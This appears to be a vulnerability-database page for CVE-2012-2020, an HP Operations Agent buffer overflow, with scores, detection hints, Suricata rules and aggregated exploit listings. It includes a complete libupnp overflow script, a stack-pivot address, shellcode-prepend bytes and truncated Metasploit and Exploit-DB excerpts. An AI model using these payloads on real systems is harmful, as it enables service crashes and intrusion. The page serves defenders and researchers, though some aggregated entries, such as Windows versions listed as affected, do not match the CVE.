CVE-2012-2020
published 2012-07-11CVE-2012-2020: Unspecified vulnerability in HP Operations Agent before 11.03.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1326.
PriorityP275critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
64.69%
99.1th percentile
Unspecified vulnerability in HP Operations Agent before 11.03.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1326.
Affected
30 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | operations_agent | <= 11.0 | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| hp | operations_agent | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1709 | — | — |
| msrc | windows_10_version_1803 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_1903 | — | — |
| msrc | windows_10_version_1909 | — | — |
| msrc | windows_10_version_2004 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_rt_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
other0x10073c2c (stackpivot ADD ESP,404 RETN from OvSecCore.dll, HP Operations Agent 11.00 / Windows 2003 SP2)↗
bytes↗
\x81\xc4\x54\xf2\xff\xff
- →Detect exploitation attempts by monitoring for HTTP requests to coda.exe containing opcode 0x8c with oversized payloads (>2084 bytes) on the random TCP port used by the service. ↗
- →Check HTTP response banner for 'server:.*coda 11.' to fingerprint vulnerable HP Operations Agent instances during reconnaissance; minor version < target threshold indicates vulnerable host. ↗
- →Monitor for the stack-adjustment prepend encoder byte sequence \x81\xc4\x54\xf2\xff\xff (ADD ESP, -3500) in TCP payloads, which is prepended to shellcode in exploit attempts. ↗
- →The exploit uses chunked HTTP encoding to deliver the overflow buffer; monitor for chunked HTTP POST bodies to coda.exe's port containing SEH record overwrites and large random-text padding (~4000 bytes). ↗
- →coda.exe runs on a random TCP port; use the Metasploit check/ping function pattern (HTTP/1.1 200 OK + coda server banner) to identify exposed instances that have been granted network access beyond localhost. ↗
- ·coda.exe is only remotely exploitable if network access has been explicitly granted in its configuration; by default it only listens on localhost, significantly limiting remote attack surface. ↗
- ·coda.exe binds to a random TCP port on each start, making static port-based firewall rules or detection signatures insufficient without dynamic port discovery. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_msrc7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
suricata·2012-09-28
CVE-2007-1036 ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)
Suricata
ET EXPLOIT Access To mm-forms-community upload dir (Inbound)
suricata·2012-09-22
CVE-2012-3574 ET EXPLOIT Access To mm-forms-community upload dir (Inbound)
ET EXPLOIT Access To mm-forms-community upload dir (Inbound)
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Access To mm-forms-community upload dir (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/wp-content/plugins/mm-forms-community/upload/temp/"; fast_pattern; reference:url,www.exploit-db.com/exploits/18997/; reference:cve,2012-3574; classtype:trojan-activity; sid:2015727; rev:4; metadata:created_at 2012_09_22, cve CVE_2012_3574, signature_severity Major, updated_at 2020_09_01;)
Suricata
ET EXPLOIT Access To mm-forms-community upload dir (Outbound)
suricata·2012-09-22
CVE-2012-3574 ET EXPLOIT Access To mm-forms-community upload dir (Outbound)
ET EXPLOIT Access To mm-forms-community upload dir (Outbound)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Access To mm-forms-community upload dir (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/wp-content/plugins/mm-forms-community/upload/temp/"; fast_pattern; reference:url,www.exploit-db.com/exploits/18997/; reference:cve,2012-3574; classtype:trojan-activity; sid:2015726; rev:4; metadata:created_at 2012_09_22, cve CVE_2012_3574, signature_severity Major, updated_at 2020_09_01;)
Exploit-DB
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
exploitdb·2020-11-27·CVSS 10.0
CVE-2012-5958 [CRITICAL] libupnp 1.6.18 - Stack-based buffer overflow (DoS)
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
---
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958
import socket
payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
Exploit-DB
CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
exploitdb·2020-03-02·CVSS 9.8
CVE-2020-8012 [CRITICAL] CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
---
# Exploit Title: CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
# Exploit Author: wetw0rk
# Exploit Version: Public POC
# Vendor Homepage: https://docops.ca.com/ca-unified-infrastructure-management/9-0-2/en
# Software Version : 7.80
# Tested on: Windows 10 Pro (x64), Windows Server 2012 R2 Standard (x64)
# CVE: CVE-2020-8012
/**************************************************************************************************************************
* *
* Description: *
* *
* Unauthenticated Nimbus nimcontroller RCE, tested against build 7.80.3132 although multiple versions are affected. *
* The exploit won't crash the service. *
* *
* You may have to run the exploit code multiple tim
Exploit-DB
Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
exploitdb·2020-01-29·CVSS 8.1
CVE-2018-8413 [HIGH] Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
---
# Exploit Title: Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
# Google Dork: n/a
# Date: 2020-10-28
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: 10 v.1803 (17134.407)
# Tested on: Windows 7, 8.0, 8.1, 10, Server 2012, Server 2012 R2, Server 2016, Server 2019
# CVE : CVE-2018-8413
# Discovered by: Eduardo Braun Prado
[Details]
Microsoft 'themepack' files are classic '.theme' files compressed for
sharing over the internet. Theme files
allows users to customize visual aspects of their device, such as icons
for known features like 'My computer'
and 'trash bin' folders, the default screensaver (which by the way
allowed attacke
Exploit-DB
HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)
exploitdb·2012-10-29
CVE-2012-2020 HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)
HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in HP Operations Agent for
Windows. The vulnerability exists in the HP Software Performance Core Program
component (coda.exe) when parsing requests for the 0x8c opcode. This module has
been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
Windows 2003 SP2 (DEP bypass).
The coda.exe com
Metasploit
HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
metasploit
HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x8c opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe components runs only for localhost by default, network access must be granted through its configuration to be remotely exploitable. On the other hand it runs on a random TCP port, to make easier reconnaissance a check function is provided.
Nuclei
Canon Devices - Authentication Bypass in Catwalk Server
nuclei·CVSS 7.5
CVE-2021-38154 [HIGH] Canon Devices - Authentication Bypass in Catwalk Server
Canon Devices - Authentication Bypass in Catwalk Server
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
Template:
id: CVE-2021-38154
info:
name: Canon Devices - Authentication Bypass in Catwalk Server
author: daffainfo
severity: high
description: |
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is
2012-07-11
Published